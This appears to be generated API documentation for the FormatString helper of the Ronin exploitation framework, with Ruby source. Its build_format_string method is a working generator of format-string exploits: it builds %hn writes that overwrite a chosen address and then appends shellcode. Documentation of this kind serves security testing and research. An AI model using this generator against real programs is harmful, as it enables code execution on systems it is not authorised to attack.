Module: Ronin::Exploits::Helpers::FormatString
- Defined in:
- lib/ronin/exploits/helpers/format_string.rb
Overview
Adds methods to exploits for generating format strings to be used in format string vulnerabilities.
Target Parameters
The format string helper uses the following target parameters:
overwrite
pop_length
address
Payloads
Uses the Payloads::Shellcode payload by default.
Instance Attribute Summary collapse
-
#format_string ⇒ Object
The format string of the exploit.
Class Method Summary collapse
Instance Method Summary collapse
-
#build_format_string ⇒ String
protected
Builds a format string using the current target and payload to be used in the format string exploit.
-
#payload_class ⇒ Class
Specifies that the exploit should use the Payloads::Shellcode class when searching for compatible payloads.
-
#test_target! ⇒ true
Tests the selected target and if it contains the
overwrite
,pop_length
andaddress
target parameters.
Instance Attribute Details
#format_string ⇒ Object
The format string of the exploit.
46 47 48 |
# File 'lib/ronin/exploits/helpers/format_string.rb', line 46 def format_string @format_string end |
Class Method Details
.extended(obj) ⇒ Object
48 49 50 |
# File 'lib/ronin/exploits/helpers/format_string.rb', line 48 def self.extended(obj) obj.instance_eval { helper :binary } end |
Instance Method Details
#build_format_string ⇒ String (protected)
Builds a format string using the current target and payload to be used in the format string exploit.
105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 |
# File 'lib/ronin/exploits/helpers/format_string.rb', line 105 def build_format_string test_target! buffer = pack(target.overwrite) + pack(target.overwrite + (target.arch.address_length / 2)) low_mask = 0xff (target.arch.address_length/2).times do low_mask <<= 8 low_mask |= 0xff end high_mask = low_mask << (target.arch.address_length*4) high = (target.address & high_mask) >> (target.arch.address_length/2) low = target.address & low_mask if low < high low -= (target.arch.address_length*2) buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",low,target.pop_length,high-low,target.pop_length+1) else high -= (target.arch.address_length*2) buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",high,target.pop_length+1,low-high,target.pop_length) end buffer << raw_payload return buffer end |
#payload_class ⇒ Class
Specifies that the exploit should use the Payloads::Shellcode class when searching for compatible payloads.
61 62 63 |
# File 'lib/ronin/exploits/helpers/format_string.rb', line 61 def payload_class Payload::Shellcode end |
#test_target! ⇒ true
Tests the selected target and if it contains the overwrite
,
pop_length
and address
target parameters.
78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 |
# File 'lib/ronin/exploits/helpers/format_string.rb', line 78 def test_target! super unless target[:overwrite] raise(TargetDataMissing,"target missing the 'overwrite' param") end unless target[:pop_length] raise(TargetDataMissing,"target missing the 'pop_length' param") end unless target[:address] raise(TargetDataMissing,"target missing the 'address' param") end return true end |